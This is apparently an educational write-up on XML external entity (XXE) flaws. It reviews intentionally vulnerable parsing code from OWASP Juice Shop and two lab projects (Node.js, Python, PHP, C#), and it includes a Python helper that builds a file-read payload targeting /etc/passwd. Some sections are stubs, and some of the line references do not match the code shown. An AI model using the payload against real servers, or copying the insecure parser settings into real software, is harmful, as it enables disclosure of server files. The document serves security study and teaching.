The source code examples below come from vulnerable web applications such as OWASP Juice Shop.
Most XML libraries now disable external DTDs by default, so most of the examples below explicitly enable them to illustrate the vulnerability.
XXE-Study contains Python, PHP and Java examples that use XML parsers in each language.
XXE-Lab contains C#, Java and Python examples that use the built-in XML classes of each language.
OWASP Juice Shop
Juice Shop contains an XXE vulnerability in its file upload functionality, at the endpoint HTTP POST /file-upload. Uploading an XML file that carries an XXE exploit triggers an XXE file read on this endpoint.
The code below shows the handleXmlUpload function from the FileUpload.js route file. The function converts the uploaded file into a string on line 5 and creates a sandbox on line 7 in which the XML is parsed. On line 9 it creates the xmlDoc variable by parsing the user input with the parseXml function of libxml (a Node.js module); the noent: true option turns on entity substitution, which is what allows external entities to be expanded. The xmlString variable is created from xmlDoc on line 10 and used on line 13, which returns an error message with xmlString concatenated into it.
function handleXmlUpload ({ file }, res, next) {
  if (utils.endsWith(file.originalname.toLowerCase(), '.xml')) {
    utils.solveIf(challenges.deprecatedInterfaceChallenge, () => { return true })
    if (file.buffer && !utils.disableOnContainerEnv()) { // XXE attacks in Docker/Heroku containers regularly cause "segfault" crashes
      const data = file.buffer.toString()
      try {
        const sandbox = { libxml, data }
        vm.createContext(sandbox)
        const xmlDoc = vm.runInContext('libxml.parseXml(data, { noblanks: true, noent: true, nocdata: true })', sandbox, { timeout: 2000 })
        const xmlString = xmlDoc.toString(false)
        utils.solveIf(challenges.xxeFileDisclosureChallenge, () => { return (matchesSystemIniFile(xmlString) || matchesEtcPasswdFile(xmlString)) })
        res.status(410)
        next(new Error('B2B customer complaints via file upload have been deprecated for security reasons: ' + utils.trunc(xmlString, 400) + ' (' + file.originalname + ')'))
      } catch (err) {
        if (utils.contains(err.message, 'Script execution timed out')) {
          if (utils.notSolved(challenges.xxeDosChallenge)) {
            utils.solve(challenges.xxeDosChallenge)
          }
          res.status(503)
          next(new Error('Sorry, we are temporarily not available! Please try again later.'))
        } else {
          res.status(410)
          next(new Error('B2B customer complaints via file upload have been deprecated for security reasons: ' + err.message + ' (' + file.originalname + ')'))
        }
      }
    } else {
      res.status(410)
      next(new Error('B2B customer complaints via file upload have been deprecated for security reasons (' + file.originalname + ')'))
    }
  }
  res.status(204).end()
}
Thus, when an XXE file-read exploit is uploaded, the code above runs and returns the file contents, truncated by utils.trunc(xmlString, 400), in the error message.
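To make the phrase "XXE file read exploit" concrete, here is a minimal sketch in Python that builds such a payload as a string. The helper name build_xxe_payload, the entity name xxe and the root element complaint are hypothetical choices for illustration, not taken from Juice Shop; /etc/passwd is used as the target because the challenge check above looks for it (matchesEtcPasswdFile).

```python
def build_xxe_payload(target_path):
    """Return an XML document that references an external entity.

    The DOCTYPE declares an entity named 'xxe' (hypothetical name) whose
    value is the content of a local file; the document body then
    references that entity.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE complaint [\n'
        f'  <!ENTITY xxe SYSTEM "file://{target_path}">\n'
        ']>\n'
        '<complaint>&xxe;</complaint>\n'
    )


# Build a payload that targets the file the Juice Shop challenge checks for.
payload = build_xxe_payload("/etc/passwd")
print(payload)
```

Saved as an .xml file and uploaded to the endpoint, a document of this shape would be parsed with noent: true, so the parser replaces &xxe; with the file contents, which then end up in xmlString and in the error message.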
XXE-Study
HLOverflow provides a lab with three XXE examples in Python, PHP and Java, which we review below. Each application consists only of a form that triggers XXE and has no other functionality.
XXE-Study Python
The Python XXE example uses the lxml etree parser.
This code handles the /xml route for the HTTP POST and GET methods. It first checks the HTTP method; for a POST request it creates the variable xml and sets it to the value of the 'xml' form parameter. The parser is then created with no_network=False, which allows network access when resolving entities (so SSRF-style requests remain possible). Finally, etree.fromstring parses the XML input and etree.tostring serializes the resulting document into the parsed_xml variable.
# app.py https://github.com/HLOverflow/XXE-study/blob/master/Apps/Python-flask-xxe/vulnserver/src/app.py
@app.route('/xml', methods=['POST', 'GET'])
def xml():
    parsed_xml = None
    errormsg = ''
    html = """
    <html>
    <body>
    """
    if request.method == 'POST':
        xml = request.form['xml']
        parser = etree.XMLParser(no_network=False) # to enable network entity. see xmlparser-info.txt
        try:
            doc = etree.fromstring(str(xml), parser)
            parsed_xml = etree.tostring(doc)
            print repr(parsed_xml)
        except:
            print "Cannot parse the xml"
            html += "Error:\n<br>\n" + traceback.format_exc()
    if (parsed_xml):
        html += "Result:\n<br>\n" + cgi.escape(parsed_xml)
    else:
        html += """
        <form action = "/xml" method = "POST">
        <p><h3>Enter xml to parse</h3></p>
        <textarea class="input" name="xml" cols="40" rows="5"></textarea>
        <p><input type = 'submit' value = 'Parse'/></p>
        </form>
        """
    html += """
    </body>
    </html>
    """
    return html
XXE-Study PHP
<?php
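// Explicitly allow libxml to load external entities.
libxml_disable_entity_loader (false);
// Read the raw request body as the XML input.
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
// LIBXML_NOENT substitutes entities and LIBXML_DTDLOAD loads the external DTD subset;
// together they make this parse call vulnerable to XXE.
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$info = simplexml_import_dom($dom);
$name = $info->name;
$password = $info->password;
// The parsed name is echoed back, so any expanded entity is reflected in the response.
echo "Sorry, this $name not available!";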
?>
XXE-Study Java
XXE-Lab
XXE-Lab contains vulnerable XXE examples that rely on each language's built-in XML classes rather than on separate XML parser libraries.
XXE-Lab Python
The Python code uses the xml.dom.minidom module, which the Python documentation describes as follows:
xml.dom.minidom is a minimal implementation of the Document Object Model interface, with an API similar to that in other languages. It is intended to be simpler than the full DOM and also significantly smaller.
Warning
The xml.dom.minidom module is not secure against maliciously constructed data. If you need to parse untrusted or unauthenticated data see XML vulnerabilities.
DOM applications typically start by parsing some XML into a DOM. With xml.dom.minidom, this is done through the parse functions.
The doLogin function uses minidom.parseString() to take the request input, parse it and convert it into a DOMTree object. Lines 15-18 use the DOMTree to extract the username and password.
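The parsing step described above can be sketched as follows. This is not the XXE-Lab source: the function names parse_login and text_of, the sample document and the entity name who are assumptions made for illustration. The sample uses an internal entity so that the sketch runs without reading any file, while still showing that entity content ends up in the extracted field.

```python
from xml.dom import minidom


def text_of(parent, tag):
    """Concatenate the text nodes of the first <tag> element under parent."""
    element = parent.getElementsByTagName(tag)[0]
    return "".join(
        node.data
        for node in element.childNodes
        if node.nodeType == node.TEXT_NODE
    )


def parse_login(xml_data):
    """Parse a login document and return (username, password)."""
    dom_tree = minidom.parseString(xml_data)
    root = dom_tree.documentElement
    return text_of(root, "username"), text_of(root, "password")


# Hypothetical request body: the username is supplied through an entity
# declared in the document's own DOCTYPE.
LOGIN_XML = (
    '<!DOCTYPE user [<!ENTITY who "admin">]>'
    "<user><username>&who;</username><password>s3cret</password></user>"
)

username, password = parse_login(LOGIN_XML)
print(username, password)
```

Because the parser substitutes the entity before the application reads the element text, the application code itself never sees that the value came from a DOCTYPE declaration rather than from literal text.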
XXE-Lab Java
The Java code uses the DocumentBuilder class:
Defines the API to obtain DOM Document instances from an XML document. Using this class, an application programmer can obtain a Document from XML.
The doGet method of the LoginServlet class creates a DocumentBuilder object and, on line 16, uses its parse method to parse the XML input stream and create a new DOM Document object. The username and password are then retrieved, checked and written to the result string.
XXE-Lab C#
The C# code uses the System.Xml.XmlDocument class:
Represents an XML document. You can use this class to load, validate, edit, add, and position XML in a document.
The doLogin method of the LoginController class handles the HTTP POST request. It constructs a StreamReader over Request.InputStream and reads the whole request body into the xmlData string with reader.ReadToEnd(). It then creates a new XmlDocument and calls doc.LoadXml(xmlData), which loads the XML document from that string.
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Web;
using System.Web.Mvc;
using System.Xml;
namespace Csharp_xxe.Controllers
{
    public class LoginController : Controller
    {
        private static string USERNAME = "admin";
        private static string PASSWORD = "admin";
        // GET: Login
        public ActionResult Index()
        {
            return View();
        }
        public void doLogin()
        {
            string result = String.Format("<result><code>{0}</code><msg>{1}</msg></result>",null,null);
            if (Request.RequestType == "POST")
            {
                try
                {
                    // Receive and read the XML stream sent in the POST request
                    StreamReader reader = new StreamReader(Request.InputStream);
                    String xmlData = reader.ReadToEnd();
                    var doc = new XmlDocument();
                    doc.LoadXml(xmlData);
                    XmlElement xRoot = doc.DocumentElement;
                    XmlNode uNode = xRoot.GetElementsByTagName("username")[0];
                    XmlNode pNode = xRoot.GetElementsByTagName("password")[0];
                    string username = uNode.InnerText;
                    string password = pNode.InnerText;
                    if (username.Equals(USERNAME) && password.Equals(PASSWORD))
                    {
                        result = String.Format("<result><code>{0}</code><msg>{1}</msg></result>", 1, username);
                    }
                    else
                    {
                        result = String.Format("<result><code>{0}</code><msg>{1}</msg></result>", 0, username);
                    }
                }
                catch (ArgumentException e1)
                {
                    result = String.Format("<result><code>{0}</code><msg>{1}</msg></result>", 3, e1);
                }
                catch (XmlException e2)
                {
                    result = String.Format("<result><code>{0}</code><msg>{1}</msg></result>", 3, e2);
                }
                finally
                {
                    Response.ContentType = "text/xml; charset=utf-8";
                    Response.Write(result);
                }
            }
        }
    }
}